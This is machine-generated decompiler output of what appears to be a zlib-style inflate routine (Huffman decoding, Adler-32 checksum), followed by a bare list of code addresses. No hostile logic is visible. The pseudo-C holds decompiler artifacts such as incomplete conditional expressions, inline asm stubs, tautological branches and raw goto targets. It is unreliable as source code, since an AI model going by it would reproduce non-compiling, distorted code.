				_t699 =  *(_t1330 + 0x38);
				_t1264 =  *((intOrPtr*)(_t1330 + 0xe0));
				_t865 =  >=  ? r14d : _t699 >> 3;
				_t631 = _t1312 * 8;
				_t522 = (_t699 & 0xfffffff8) - _t631;
				 *(_t1330 + 0x38) = _t522;
				_t1414 = _t1411 - __r15 + _t1264 - _t1312;
				if (_t1414 - _t1264 > 0) goto 0xf30613c7;
				_t1415 = _t1414 + _t1392;
				 *(_t1330 + 0x30) =  !(0xffffffff << (_t522 & 0x00000038)) &  *(_t1330 + 0x30) >> (_t699 & 0x00000007);
				r12b = 0x18;
				if (( *(_t1330 + 0x1b8) & 0x00000001) == 0) goto 0xf305f43b;
				 *(_t1330 + 0x40) = 0;
				r12b = 0x17;
				_t703 =  *(_t1330 + 0x40) & 0x000001ff;
				 *(_t1330 + 0x40) = _t703;
				r12b = 0x14;
				if (_t703 == 0x100) goto 0xf305f43b;
				r12b = 0x20;
				if (_t703 - 0x11d > 0) goto 0xf305f43b;
				_t704 =  *(_t1074 + 0xf311eee8) & 0x000000ff;
				_t973 = _t704;
				r12b = _t973 == 0;
				 *(_t1330 + 0x44) = _t704;
				 *(_t1330 + 0x40) =  *(0xf311ef08 + _t1074 * 2) & 0x0000ffff;
				r12b = r12b | 0x0000000e;
				r9d =  *(_t1330 + 0x3c);
				if (_t973 >= 0) goto 0xf3060382;
				r12b = 0x1d;
				if ( *((intOrPtr*)(_t1330 + 0xf4)) != 0) goto 0xf305f43b;
				_t1285 = _t1343 + 0xf311ef08;
				_t1223 =  *((intOrPtr*)(_t1330 + 0x1a8));
				_t975 = _t1285 - _t1223;
				if (_t975 > 0) goto 0xf30603b1;
				_t1078 = (_t1343 - _t1361 &  *(_t1330 + 0xb8)) - _t1343;
				if (_t975 < 0) goto 0xf3060a9a;
				if (_t1078 - 0xf311ef08 >= 0) goto 0xf3060a9a;
				r12d = 0x13;
				r12d =  ==  ? 0xc : r12d;
				_t530 =  *(_t1330 + 0x40);
				_t810 =  *(_t1330 + 0x50);
				if (_t530 - 3 > 0) goto 0xf3060605;
				_t706 =  *(_t1330 + 0x38);
				if (_t706 == 0) goto 0xf3060421;
				_t1317 = _t1415;
				if (_t706 - 8 >= 0) goto 0xf3060436;
				if (_t1317 == __r15) goto 0xf3060413;
				_t1151 =  *(_t1330 + 0x30) | _t1223 << _t706;
				 *(_t1330 + 0x30) = _t1151;
				 *(_t1330 + 0x38) = _t706 + 8;
				r12d = 0;
				goto 0xf3060419;
				r12d = _t810;
				if ((r12b & 0x00000002) == 0) goto 0xf30603e8;
				goto 0xf306046a;
				if (_t1317 + 1 == __r15) goto 0xf3060464;
				goto 0xf3060453;
				_t1226 = _t1151 >> 8;
				 *(_t1330 + 0x30) = _t1226;
				 *(_t1330 + 0x38) = ( *(_t1369 + 0x14) << 8) + 0xfffffff8;
				_t772 =  *(_t1369 + 0x14) << 8;
				_t712 = _t631 & 0x000000ff | _t772;
				 *(_t1369 + 0x14) = _t712;
				 *(_t1330 + 0x40) = _t530 + 1;
				r12d = 0;
				goto 0xf306046a;
				r12d = _t810;
				if (r12b == 0) goto 0xf30603cf;
				if ((r12b & 0xffffffff) == 1) goto 0xf30606d0;
				goto 0xf3060c1b;
				_t533 = _t712 & 0x000000ff;
				if (_t533 == 1) goto 0xf30606d0;
				goto 0xf3060c27;
				_t867 =  !_t865 & _t772;
				_t1227 = _t1226 >> _t533;
				 *(_t1330 + 0x30) = _t1227;
				 *(_t1330 + 0x38) = _t631;
				 *(_t1330 + 0x40) =  *(_t1330 + 0x40) + _t867;
				r12b = 0xf;
				goto 0xf305f43b;
				 *(_t1330 + 0x30) = _t1227 >> _t533;
				 *(_t1330 + 0x38) = _t631;
				 *(_t1330 + 0x3c) =  *(_t1330 + 0x3c) + ( !_t867 & _t772);
				r12b = 0x16;
				goto 0xf305f43b;
				 *(_t1330 + 0x30) = _t1151 >> _t533;
				 *(_t1330 + 0x38) = _t810;
				 *(_t1330 + 0x80) = _t1078;
				 *(_t1330 + 0x88) = _t1078;
				 *((long long*)(_t1330 + 0x90)) = 0xb;
				_t716 =  *(_t1330 + 0x3c);
				_t1079 = _t1078 & 0xf311ef08;
				if (3 == 3) goto 0xf30612f1;
				if (_t716 != 0x10) goto 0xf30606d9;
				if (_t1285 - 1 - 0x1c9 >= 0) goto 0xf3061307;
				goto 0xf30606db;
				 *(_t1330 + 0x30) = _t1079 >> 8;
				 *(_t1330 + 0x38) = _t716 + 0xfffffff8;
				 *(_t1330 + 0x3c) = 3;
				r12b = 0x12;
				goto 0xf305f43b;
				_t536 =  *(_t1369 + 0x291d) & 0x0000ffff;
				 *(_t1330 + 0x40) = _t536;
				r12b = 0x1e;
				if (_t536 != 0x2101) goto 0xf305f43b;
				r12b = 0x14;
				if (_t536 == 0) goto 0xf305f43b;
				r12d = 0x11;
				r12d =  ==  ? 6 : r12d;
				goto 0xf305f43b;
				r8d = 0x120;
				_t1181 =  *((intOrPtr*)(_t1330 + 0x128));
				E000007FE7FEF30F24C0();
				_t1370 =  *((intOrPtr*)(_t1330 + 0x58));
				 *(_t1330 + 0x40) = 0;
				r12b = 9;
				goto 0xf305f43b;
				r12b = 0x18;
				goto 0xf305f43b;
				if (_t1079 - 0xf >= 0) goto 0xf3060746;
				r9d =  *(_t1330 + 0x6c);
				if (_t1181 - 1 > 0) goto 0xf3060acc;
				_t720 =  *(_t1330 + 0x38);
				_t541 =  *((short*)(_t1370 + 0x3c + _t1079 * 2));
				if (_t541 < 0) goto 0xf3060659;
				if ((_t541 & 0x0000ffff) - 0x200 < 0) goto 0xf3060699;
				_t542 = _t541 >> 9;
				if (_t720 - _t542 < 0) goto 0xf3060699;
				goto 0xf3060aec;
				if (_t720 - 0xb < 0) goto 0xf3060699;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t542 - 0x23f > 0) goto 0xf3061218;
				_t544 =  *((short*)(_t1370 + 0x83c + _t1079 * 2));
				if (_t544 >= 0) goto 0xf3060690;
				if (_t720 - 0xc >= 0) goto 0xf3060663;
				if (_t544 >= 0) goto 0xf3060aec;
				if (__r15 == __r15) goto 0xf3061245;
				_t1419 = __r15 + 1;
				 *(_t1330 + 0x30) =  *(_t1330 + 0x30) | _t1079 << _t720;
				 *(_t1330 + 0x38) = _t1181 + 8;
				_t1004 = _t720 - 6;
				if (_t1004 <= 0) goto 0xf3060631;
				goto 0xf3060aee;
				r12w = 0x2200;
				r12d = r12d >> 8;
				goto 0xf305f43b;
				_t1266 =  *((intOrPtr*)(_t1330 + 0x80 + _t1079 * 8)) + (_t1151 & 0xffffffff);
				if (_t1004 < 0) goto 0xf30613e0;
				if (_t1266 + _t1285 - 0x1c9 > 0) goto 0xf30613f4;
				if (_t1266 == 0) goto 0xf3060718;
				E000007FE7FEF30F24C0();
				 *(_t1330 + 0x40) =  *(_t1330 + 0x40) + _t810;
				r12b = 0xa;
				_t1371 =  *((intOrPtr*)(_t1330 + 0x58));
				_t1381 =  *((intOrPtr*)(_t1330 + 0x1a0));
				_t1346 =  *(_t1330 + 0x70);
				goto 0xf305f43b;
				r12b = 0x1a;
				goto 0xf305f43b;
				r12b = 0x22;
				goto 0xf305f43b;
				goto 0xf3060aee;
				_t834 =  *(_t1330 + 0x38);
				 *(_t1330 + 0x68) =  *(_t1330 + 0x3c);
				r9d =  *(_t1330 + 0x44);
				_t1085 = __r15 - _t1419;
				r12b = 0xc;
				if (_t1085 - 0xe < 0) goto 0xf3060b66;
				if (_t834 - 0x1d > 0) goto 0xf3060794;
				_t1086 = _t1085 << _t834;
				_t1420 = _t1419 + 4;
				_t723 =  *((short*)(_t1371 + 0x3c + _t1086 * 2));
				if (_t723 < 0) goto 0xf30607bc;
				if (0x2101 - 0x200 < 0) goto 0xf30611d8;
				goto 0xf30607e8;
				asm("dec eax");
				asm("adc ecx, 0x0");
				if ( !_t723 - 0x23f > 0) goto 0xf306126f;
				_t1012 =  *((short*)(_t1371 + 0x83c +  &(( *(_t1330 + 0xe8))[_t1285]) * 2));
				if (_t1012 < 0) goto 0xf30607c1;
				asm("bt ebp, 0x8");
				if (_t1012 < 0) goto 0xf30608a8;
				_t558 =  *((short*)(_t1371 + 0x3c + _t1086 * 2));
				if (_t558 < 0) goto 0xf3060820;
				if ((_t558 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf306084b;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t558 - 0x23f > 0) goto 0xf306127b;
				_t560 =  *((short*)(_t1371 + 0x83c + _t1086 * 2));
				if (_t560 < 0) goto 0xf3060825;
				_t561 = _t560 & 0x0000ffff;
				_t1017 = _t1346 -  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t1017 >= 0) goto 0xf3061284;
				_t837 = _t834 + 0x20;
				 *(_t1381 + _t1346) = bpl;
				_t1183 = _t1346 + 1;
				asm("bt eax, 0x8");
				if (_t1017 < 0) goto 0xf30608a3;
				_t1236 =  *((intOrPtr*)(_t1330 + 0x1a8));
				if (_t1183 - _t1236 >= 0) goto 0xf30612a2;
				 *(_t1381 + _t1346 + 1) = _t561;
				if (_t1236 - _t1346 + 2 - 0x103 < 0) goto 0xf3060b66;
				goto 0xf3060773;
				_t1348 = _t1183;
				_t563 = _t561 & 0x000001ff;
				if (_t563 == 0x100) goto 0xf3060b5e;
				if (_t563 - 0x11d > 0) goto 0xf3061298;
				if (_t837 - 0x1d > 0) goto 0xf30608ec;
				if (__r15 - _t1420 - 3 <= 0) goto 0xf306140a;
				_t1421 = _t1420 + 4;
				r9d =  *0x7FEF311EEE7 & 0x000000ff;
				if (r9b == 0) goto 0xf306092b;
				_t571 =  *((short*)(_t1371 + 0xdda));
				if (_t571 < 0) goto 0xf3060955;
				if ((_t571 & 0x0000ffff) - 0x200 < 0) goto 0xf30611d8;
				goto 0xf3060980;
				asm("dec eax");
				asm("adc eax, 0x0");
				if ( !_t571 - 0x23f > 0) goto 0xf306127b;
				_t573 =  *((short*)(_t1371 + 0x15da));
				if (_t573 < 0) goto 0xf306095a;
				_t840 = _t837 + 0x20 - r9d - 0xb;
				if ((_t573 & 0x1ff) - 0x1d > 0) goto 0xf30612ae;
				r9d =  *0x7FEF311EF47 & 0x000000ff;
				 *(_t1330 + 0x68) =  *0x7FEF311EF66 & 0x0000ffff;
				 *((long long*)(_t1330 + 0x118)) = _t1361;
				if (r9d == 0) goto 0xf3060a01;
				if (_t840 - 0x1d > 0) goto 0xf30609e2;
				if (__r15 - _t1421 - 3 <= 0) goto 0xf306140a;
				_t1275 = ((( *(_t1330 + 0x30) | _t1086) >> 0x0000000a >> 0xb | __r15 - _t1420 << _t837) >> r9d >> 0xb | 0xffffffff << r9d << _t840) >> r9d;
				_t842 = _t840 + 0x20 - r9d;
				 *(_t1330 + 0x68) = ( !( *_t1421) & _t810) +  *(_t1330 + 0x68);
				r9d =  *(_t1330 + 0x68);
				if (_t1348 - _t1361 >= 0) goto 0xf3060a19;
				if ( *((intOrPtr*)(_t1330 + 0xf4)) != 0) goto 0xf30612b6;
				 *(_t1330 + 0x70) = _t1392;
				 *((long long*)(_t1330 + 0x120)) = 0xf311ef68;
				 *((long long*)(_t1330 + 0x28)) =  *(_t1330 + 0xb8);
				 *((long long*)(_t1330 + 0x20)) = 0xf311ef68;
				_t1186 = _t1381;
				_t1241 =  *((intOrPtr*)(_t1330 + 0x1a8));
				E000007FE7FEF306148C(_t1186, _t1241, _t1348, _t1361);
				if ( *((intOrPtr*)(_t1330 + 0x1a8)) - _t1348 +  *((intOrPtr*)(_t1330 + 0x120)) - 0x103 >= 0) goto 0xf306076a;
				goto 0xf3060b66;
				 *(_t1330 + 0x40) = _t842;
				goto 0xf305f43b;
				_t1102 =  *(_t1330 + 0xb8);
				 *((long long*)(_t1330 + 0x28)) = _t1102;
				 *((long long*)(_t1330 + 0x20)) = _t1186;
				_t1187 =  *((intOrPtr*)(_t1330 + 0x1a0));
				_t582 = E000007FE7FEF306148C(_t1187, _t1241, _t1186,  *((intOrPtr*)(_t1330 + 0x118)));
				_t1373 =  *((intOrPtr*)(_t1330 + 0x58));
				r12b = 0xc;
				goto 0xf305f43b;
				_t742 = _t582;
				_t1243 = _t1241 << _t742 |  *(_t1330 + 0x30);
				 *(_t1330 + 0x30) = _t1243;
				 *(_t1330 + 0x38) = _t582 + 0x10;
				goto 0xf3060aee;
				_t811 =  *((short*)(_t1373 + 0x3c + _t1187 * 2));
				if (_t811 < 0) goto 0xf3060b0d;
				goto 0xf3060b39;
				asm("dec eax");
				asm("adc edi, 0x0");
				if ( !(_t811 & 0x000001ff) - 0x23f > 0) goto 0xf30611c7;
				_t814 =  *((short*)(_t1373 + 0x83c + _t1275 * 2));
				if (_t814 < 0) goto 0xf3060b12;
				r12b = 0x22;
				if (0xa == 0) goto 0xf305f43b;
				 *(_t1330 + 0x30) = _t1243 >> 0xb;
				 *(_t1330 + 0x38) = _t742 - 0xb;
				 *(_t1330 + 0x40) = _t814 & 0x0000ffff;
				r12b = 0xd;
				goto 0xf305f43b;
				r12b = 0x14;
				 *(_t1330 + 0x30) = _t1275;
				 *(_t1330 + 0x38) = _t842;
				 *(_t1330 + 0x3c) =  *(_t1330 + 0x68);
				 *(_t1330 + 0x40) = 0x100;
				 *(_t1330 + 0x44) = r9d;
				goto 0xf305f43b;
				 *((char*)(_t1187 + 8)) = 0xfd;
				 *_t1187 = _t1102;
				 *((long long*)(_t1187 + 0x10)) = _t1102;
				goto 0xf3061193;
				r12b = 0x13;
				goto 0xf3060c5a;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 2;
				_t1374 =  *((intOrPtr*)(_t1330 + 0x58));
				goto 0xf3060c14;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 3;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 9;
				goto 0xf3060c31;
				r12b = 0xe;
				goto 0xf3060bdb;
				r12b = 0x10;
				r9d = 2 >> 8 >> 8;
				goto 0xf3060c31;
				r12b = 0xb;
				goto 0xf3060bee;
				r12b = 0x11;
				r9d = 0x100 >> 8 >> 8;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xa;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 5;
				goto 0xf3060c31;
				r9d = r12d;
				r12b = 8;
				goto 0xf3060c34;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0x17;
				goto 0xf3060c31;
				r12d = r12d >> 8;
				r9d = r12d;
				r12b = 0xf;
				if (r9b == 1) goto 0xf3060c9a;
				_t588 = r9b & 0xffffffff;
				if (_t588 == 0xfc) goto 0xf3060cbe;
				_t749 =  *(_t1330 + 0x38);
				_t818 =  >=  ? _t588 - r15d + r14d : _t749 >> 3;
				_t591 = _t1275 * 8;
				 *(_t1330 + 0x38) = _t749 - _t591;
				_t1288 =  &(_t1421[1]);
				_t1328 =  *((intOrPtr*)(_t1330 + 0x1b0));
				goto 0xf3060cc0;
				_t1188 =  *((intOrPtr*)(_t1330 + 0x1a8));
				if ( *(_t1330 + 0x70) != _t1188) goto 0xf3060cbb;
				r9b = 2;
				r9b = r9b - (_t591 & 0xffffff00 | r12b == 0x00000017);
				_t1355 = _t1188;
				goto 0xf3060cc0;
				r9b = 1;
				 *(_t1374 + 0x291c) = r12b;
				_t751 =  *(_t1330 + 0x38);
				 *(_t1374 + 8) = _t751;
				 *(_t1374 + 0x24) =  *(_t1330 + 0x3c);
				 *(_t1374 + 0x28) =  *(_t1330 + 0x40);
				 *(_t1374 + 0x2c) =  *(_t1330 + 0x44);
				 *_t1374 =  !(0xffffffff << _t751) &  *(_t1330 + 0x30);
				_t1045 =  *(_t1330 + 0x1b8) & 0x00000040;
				if (_t1045 != 0) goto 0xf3061169;
				if (_t1045 == 0) goto 0xf3061169;
				_t1046 = r9b;
				if (_t1046 < 0) goto 0xf3061169;
				_t1155 = _t1355 - _t1328;
				if (_t1046 < 0) goto 0xf306137a;
				 *(_t1330 + 0xb8) = _t1275;
				 *(_t1330 + 0x6c) = r9d;
				if (_t1355 -  *((intOrPtr*)(_t1330 + 0x1a8)) > 0) goto 0xf3061389;
				_t595 =  *(_t1374 + 0x20);
				_t1384 =  *((intOrPtr*)(_t1330 + 0x1a0)) + _t1328;
				_t821 = _t595 & 0x0000ffff;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0xc0], xmm0");
				asm("movaps [esp+0xa0], xmm0");
				_t1190 = _t1155 & 0xfffffffc;
				 *(_t1330 + 0xf8) = _t1155;
				 *(_t1330 + 0x108) = _t1155;
				_t1111 = _t1190 - 0x3f51f0dfc0;
				 *(_t1330 + 0x50) = _t1111;
				r12d = 0x56c0;
				 *(_t1330 + 0xe8) = _t1384;
				 *(_t1330 + 0xd8) = _t1288;
				 *(_t1330 + 0x7c) = _t821;
				 *(_t1330 + 0x100) = _t1190;
				if (0x3f51f0dfc0 - __r12 < 0) goto 0xf3060efe;
				r11d = _t821 * 0x56c0;
				_t1395 = _t1384;
				 *(_t1330 + 0x80) =  *_t1395 & 0x000000ff;
				 *(_t1330 + 0x84) = _t1395[1] & 0x000000ff;
				 *(_t1330 + 0x88) = _t1395[2] & 0x000000ff;
				 *(_t1330 + 0x8c) = _t1395[3] & 0x000000ff;
				r10d = 0;
				 *((intOrPtr*)(_t1330 + 0xc0 + _t1374 * 4)) =  *((intOrPtr*)(_t1330 + 0xc0 + _t1374 * 4)) +  *((intOrPtr*)(_t1330 + 0x80 + _t1374 * 4));
				_t386 = _t1374 + 1; // 0x1
				if (_t386 != 4) goto 0xf3060e1d;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				 *((intOrPtr*)(_t1330 + 0xa0 + _t1288 * 4)) =  *((intOrPtr*)(_t1330 + 0xa0 + _t1288 * 4)) +  *((intOrPtr*)(_t1330 + 0x80 + _t1288 * 4));
				_t396 = _t1288 + 1; // 0x1
				_t1050 = _t396 - 4;
				if (_t1050 != 0) goto 0xf3060e4c;
				_t1112 = _t1111 + 0xfffffffc;
				if (_t1050 != 0) goto 0xf3060dea;
				_t640 =  *(_t1330 + 0xc0 + _t1112 * 4);
				 *(_t1330 + 0xc0 + _t1112 * 4) = _t640;
				_t403 = _t1112 + 1; // 0x1
				_t1156 = _t403;
				_t1113 = _t1156;
				if (_t1156 != 4) goto 0xf3060e77;
				 *((intOrPtr*)(_t1330 + 0xa0 + _t1113 * 4)) =  *((intOrPtr*)(_t1330 + 0xa0 + _t1113 * 4)) - _t640 * 0xfff1;
				_t410 = _t1113 + 1; // 0x1
				if (_t410 != 4) goto 0xf3060ea7;
				_t1117 = _t1328 * _t1190 >> 0x2f;
				_t1053 = 0x3f51f08900 - __r12;
				if (_t1053 >= 0) goto 0xf3060de2;
				_t1427 =  *(_t1330 + 0x108);
				r14d = r14d & 0x00000003;
				_t1358 =  *((intOrPtr*)(_t1330 + 0x58));
				r10d =  *(_t1330 + 0x1b8);
				_t1293 =  *(_t1330 + 0xe8);
				r12d =  *(_t1330 + 0x7c);
				if (_t1053 == 0) goto 0xf3060fc8;
				_t1364 = 0x3f51f0dfc0 + _t1293;
				 *(_t1330 + 0x80) =  *_t1364 & 0x000000ff;
				 *(_t1330 + 0x84) = _t1364[1] & 0x000000ff;
				 *(_t1330 + 0x88) = _t1364[2] & 0x000000ff;
				 *(_t1330 + 0x8c) = _t1364[3] & 0x000000ff;
				 *((intOrPtr*)(_t1330 + 0xc0 + _t1117 * 4)) =  *((intOrPtr*)(_t1330 + 0xc0 + _t1117 * 4)) +  *((intOrPtr*)(_t1330 + 0x80 + _t1117 * 4));
				_t434 = _t1117 + 1; // 0x1
				_t1250 = _t434;
				_t1118 = _t1250;
				if (_t1250 != 4) goto 0xf3060f72;
				asm("movaps xmm0, [esp+0xc0]");
				asm("movaps [esp+0x80], xmm0");
				_t785 =  *(_t1330 + 0x80 + _t1118 * 4);
				 *((intOrPtr*)(_t1330 + 0xa0 + _t1118 * 4)) =  *((intOrPtr*)(_t1330 + 0xa0 + _t1118 * 4)) + _t785;
				_t444 = _t1118 + 1; // 0x1
				_t1251 = _t444;
				_t1119 = _t1251;
				_t1055 = _t1251 - 4;
				if (_t1055 != 0) goto 0xf3060f9f;
				if (_t1055 != 0) goto 0xf3060f41;
				_t786 = _t785 * 0xfff1;
				 *((intOrPtr*)(_t1330 + 0xc0 + _t1119 * 4)) =  *((intOrPtr*)(_t1330 + 0xc0 + _t1119 * 4)) - _t786;
				_t452 = _t1119 + 1; // 0x1
				_t1255 = _t452;
				_t1120 = _t1255;
				if (_t1255 != 4) goto 0xf3060fd7;
				r9d =  *(_t1330 + 0x6c);
				 *((intOrPtr*)(_t1330 + 0xa0 + _t1120 * 4)) =  *((intOrPtr*)(_t1330 + 0xa0 + _t1120 * 4)) - _t786 * 0xfff1;
				_t461 = _t1120 + 1; // 0x1
				_t1259 = _t461;
				_t1121 = _t1259;
				if (_t1259 != 4) goto 0xf3061019;
				 *(_t1330 + 0xa0 + _t1121 * 4) =  *(_t1330 + 0xa0 + _t1121 * 4) << 2;
				_t1122 = _t1121 + 1;
				if (_t1122 != 4) goto 0xf3061051;
				 *((intOrPtr*)(_t1330 + 0xa4)) =  *((intOrPtr*)(_t1330 + 0xa4)) -  *((intOrPtr*)(_t1330 + 0xc4)) + 0xfff1;
				 *((intOrPtr*)(_t1330 + 0xa8)) =  ~( *((intOrPtr*)(_t1330 + 0xc8)) +  *((intOrPtr*)(_t1330 + 0xc8))) +  *((intOrPtr*)(_t1330 + 0xa8)) + 0x1ffe2;
				 *((intOrPtr*)(_t1330 + 0xac)) =  *((intOrPtr*)(_t1330 + 0xac)) + _t1259 + _t1259 * 2;
				_t1123 = _t1122 + 1;
				if (_t1123 != 4) goto 0xf30610b4;
				r12d = r12d *  *(_t1330 + 0x50);
				_t1125 = _t1123 * _t1328 >> 0x2f;
				_t1126 = _t1125 + 1;
				if (_t1126 != 4) goto 0xf30610e4;
				if (_t1427 == 0) goto 0xf306110b;
				_t761 = r12d +  *((intOrPtr*)(_t1330 + 0xc0 + _t1122 * 4)) + ( *(_t1293 +  *(_t1330 + 0x100) + _t1126) & 0x000000ff);
				_t891 = (_t595 >> 0x10) + r11d + r12d - 0x800000007961 +  *((intOrPtr*)(_t1330 + 0xa0 + _t1125 * 4)) + _t761;
				if (_t1427 != _t1126 + 1) goto 0xf30610fb;
				_t624 = _t891 * 0xfff1;
				_t894 = _t891 - _t624 << 0x00000010 | _t761 - _t761 * 0x0000fff1;
				 *(_t1358 + 0x20) = _t894;
				_t1063 = r9b;
				if (_t1063 != 0) goto 0xf30611a7;
				r10d = r10d & 0x00000001;
				if (_t1063 == 0) goto 0xf306117f;
				r9b = _t894 ==  *((intOrPtr*)(_t1358 + 0x14));
				r9b = r9b + r9b;
				r9b = r9b + 0xfe;
				goto 0xf306117f;
				_t1133 =  *((intOrPtr*)(_t1330 + 0x110));
				 *(_t1133 + 8) = r9b;
				 *_t1133 =  *((intOrPtr*)(_t1330 + 0xe0)) -  *(_t1330 + 0xb8) + __r15 +  *(_t1330 + 0xd8);
				 *((long long*)(_t1133 + 0x10)) = _t1358 - _t1328;
				return _t624;
			}

0x7fef305fa98
0x7fef305fa9c
0x7fef305faa3
0x7fef305faa9
0x7fef305faaf
0x7fef305fabc
0x7fef305fac1
0x7fef305fac7
0x7fef305facd
0x7fef305fad0
0x7fef305fad8
0x7fef305fadc
0x7fef305fadf
0x7fef305fae2
0x7fef305fae7
0x7fef305faee
0x7fef305faf0
0x7fef305faf5
0x7fef305faf7
0x7fef305faff
0x7fef305fb07
0x7fef305fb10
0x7fef305fb18
0x7fef305fb1e
0x7fef305fb28
0x7fef305fb2c
0x7fef305fb2f
0x7fef305fb34
0x7fef305fb3a
0x7fef305fb47
0x7fef305fb52
0x7fef305fb5a
0x7fef305fb60
0x7fef305fb63
0x7fef305fb6b
0x7fef305fb79
0x7fef305fb7c
0x7fef305fb82
0x7fef305fb93
0x7fef305fb9e
0x7fef305fba2
0x7fef305fba5
0x7fef305fbae
0x7fef305fbb1
0x7fef305fbba
0x7fef305fbcc
0x7fef305fbe3
0x7fef305fbe7
0x7fef305fbe9
0x7fef305fbed
0x7fef305fbf0
0x7fef305fbf3
0x7fef305fbfd
0x7fef305fc02
0x7fef305fc0b
0x7fef305fc10
0x7fef305fc14
0x7fef305fc24
0x7fef305fc2c
0x7fef305fc37
0x7fef305fc3a
0x7fef305fc42
0x7fef305fc50
0x7fef305fc55
0x7fef305fc57
0x7fef305fc61
0x7fef305fc64
0x7fef305fc6c
0x7fef305fc70
0x7fef305fc73
0x7fef305fc79
0x7fef305fc7e
0x7fef305fc85
0x7fef305fc87
0x7fef305fc9b
0x7fef305fca0
0x7fef305fcb6
0x7fef305fcbb
0x7fef305fcbe
0x7fef305fcc3
0x7fef305fccb
0x7fef305fcd5
0x7fef305fcdc
0x7fef305fcf3
0x7fef305fcf5
0x7fef305fcfe
0x7fef305fd04
0x7fef305fd09
0x7fef305fd15
0x7fef305fd18
0x7fef305fd1d
0x7fef305fd20
0x7fef305fd24
0x7fef305fd27
0x7fef305fd2a
0x7fef305fd2f
0x7fef305fd36
0x7fef305fd38
0x7fef305fd3a
0x7fef305fd4a
0x7fef305fd4d
0x7fef305fd56
0x7fef305fd59
0x7fef305fd61
0x7fef305fd66
0x7fef305fd69
0x7fef305fd72
0x7fef305fd7a
0x7fef305fd81
0x7fef305fd95
0x7fef305fd9f
0x7fef305fda3
0x7fef305fda9
0x7fef305fdb3
0x7fef305fdb6
0x7fef305fdca
0x7fef305fdce
0x7fef305fdd9
0x7fef305fde2
0x7fef305fde7
0x7fef305fdf0
0x7fef305fdf8
0x7fef305fdfe
0x7fef305fe01
0x7fef305fe0c
0x7fef305fe13
0x7fef305fe1e
0x7fef305fe25
0x7fef305fe2e
0x7fef305fe35
0x7fef305fe41
0x7fef305fe47
0x7fef305fe4d
0x7fef305fe55
0x7fef305fe64
0x7fef305fe68
0x7fef305fe6d
0x7fef305fe70
0x7fef305fe74
0x7fef305fe83
0x7fef305fe8b
0x7fef305fe96
0x7fef305fea1
0x7fef305feaa
0x7fef305feae
0x7fef305feb7
0x7fef305febd
0x7fef305fec8
0x7fef305feca
0x7fef305fecf
0x7fef305fed3
0x7fef305fed6
0x7fef305fedb
0x7fef305fedd
0x7fef305fee1
0x7fef305fee4
0x7fef305fee8
0x7fef305fef6
0x7fef305fefe
0x7fef305ff09
0x7fef305ff14
0x7fef305ff1d
0x7fef305ff21
0x7fef305ff2a
0x7fef305ff3d
0x7fef305ff45
0x7fef305ff4c
0x7fef305ff50
0x7fef305ff58
0x7fef305ff5e
0x7fef305ff66
0x7fef305ff6a
0x7fef305ff7b
0x7fef305ff81
0x7fef305ff86
0x7fef305ff8f
0x7fef305ff93
0x7fef305ff9b
0x7fef305ffa9
0x7fef305ffac
0x7fef305ffb2
0x7fef305ffb8
0x7fef305ffbc
0x7fef305ffbf
0x7fef305ffc7
0x7fef305ffd7
0x7fef305ffe0
0x7fef305ffe7
0x7fef305fff5
0x7fef3060000
0x7fef306000b
0x7fef306000d
0x7fef3060012
0x7fef3060014
0x7fef306001c
0x7fef3060028
0x7fef306002c
0x7fef3060035
0x7fef306003b
0x7fef3060046
0x7fef306004f
0x7fef3060054
0x7fef3060059
0x7fef3060068
0x7fef306006b
0x7fef306006e
0x7fef3060073
0x7fef3060076
0x7fef306007d
0x7fef3060083
0x7fef306008f
0x7fef3060092
0x7fef3060095
0x7fef306009a
0x7fef306009d
0x7fef30600a9
0x7fef30600b4
0x7fef30600c1
0x7fef30600ca
0x7fef30600ce
0x7fef30600d7
0x7fef30600dd
0x7fef30600ea
0x7fef30600f1
0x7fef30600fa
0x7fef3060101
0x7fef306010c
0x7fef306011e
0x7fef306012d
0x7fef306013b
0x7fef306013e
0x7fef3060142
0x7fef3060149
0x7fef306014b
0x7fef3060151
0x7fef3060159
0x7fef3060160
0x7fef3060167
0x7fef306016e
0x7fef3060175
0x7fef306017e
0x7fef306018c
0x7fef3060194
0x7fef306019a
0x7fef306019d
0x7fef30601a8
0x7fef30601af
0x7fef30601b7
0x7fef30601ba
0x7fef30601c0
0x7fef30601ca
0x7fef30601ce
0x7fef30601db
0x7fef30601e1
0x7fef30601e5
0x7fef30601e9
0x7fef30601f2
0x7fef30601f7
0x7fef3060200
0x7fef306020b
0x7fef3060214
0x7fef3060217
0x7fef306022d
0x7fef3060231
0x7fef3060236
0x7fef3060241
0x7fef3060244
0x7fef3060254
0x7fef3060259
0x7fef306025c
0x7fef3060261
0x7fef3060265
0x7fef3060267
0x7fef3060271
0x7fef3060279
0x7fef3060284
0x7fef3060290
0x7fef30602a3
0x7fef30602a7
0x7fef30602ae
0x7fef30602b0
0x7fef30602b4
0x7fef30602ba
0x7fef30602c6
0x7fef30602dd
0x7fef30602e2
0x7fef30602ee
0x7fef30602f4
0x7fef30602fc
0x7fef306030a
0x7fef3060310
0x7fef3060314
0x7fef306031d
0x7fef3060323
0x7fef306032c
0x7fef306033e
0x7fef3060342
0x7fef3060344
0x7fef3060348
0x7fef3060357
0x7fef306035b
0x7fef3060364
0x7fef306036f
0x7fef3060371
0x7fef306037c
0x7fef3060386
0x7fef306038a
0x7fef3060392
0x7fef3060395
0x7fef306039f
0x7fef30603a2
0x7fef30603ab
0x7fef30603b8
0x7fef30603be
0x7fef30603c7
0x7fef30603cb
0x7fef30603d2
0x7fef30603d8
0x7fef30603de
0x7fef30603e5
0x7fef30603eb
0x7fef30603f0
0x7fef30603fc
0x7fef30603ff
0x7fef3060407
0x7fef306040b
0x7fef3060411
0x7fef3060416
0x7fef306041d
0x7fef306041f
